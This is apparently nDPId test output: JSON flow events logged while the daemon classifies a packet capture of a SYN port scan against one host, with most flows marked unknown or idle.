+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2099,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":844,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":844,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2099,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":903,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":903,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00746{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1278275056276,"flow_last_seen":1278275077368,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":53,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00575{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1278275056276,"flow_last_seen":1278275077368,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1931,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2103,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1931,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1991,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2103,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1991,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2105,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2105,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":878,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":12345,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":878,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":12345,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1705,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2105,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1705,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2105,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":927,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":12345,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":927,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":12345,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2106,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":730,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2107,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":730,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2107,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2106,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":775,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2107,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":775,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2107,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1628,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8254,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1628,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8254,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1713,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8254,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1713,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8254,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1486,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2111,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1486,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1563,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2111,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1563,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1184,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1278275060291,"flow_last_seen":1278275060352,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":70,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1184,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1278275060291,"flow_last_seen":1278275060352,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":70,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2119,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2119,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":595,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2121,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":595,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2121,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 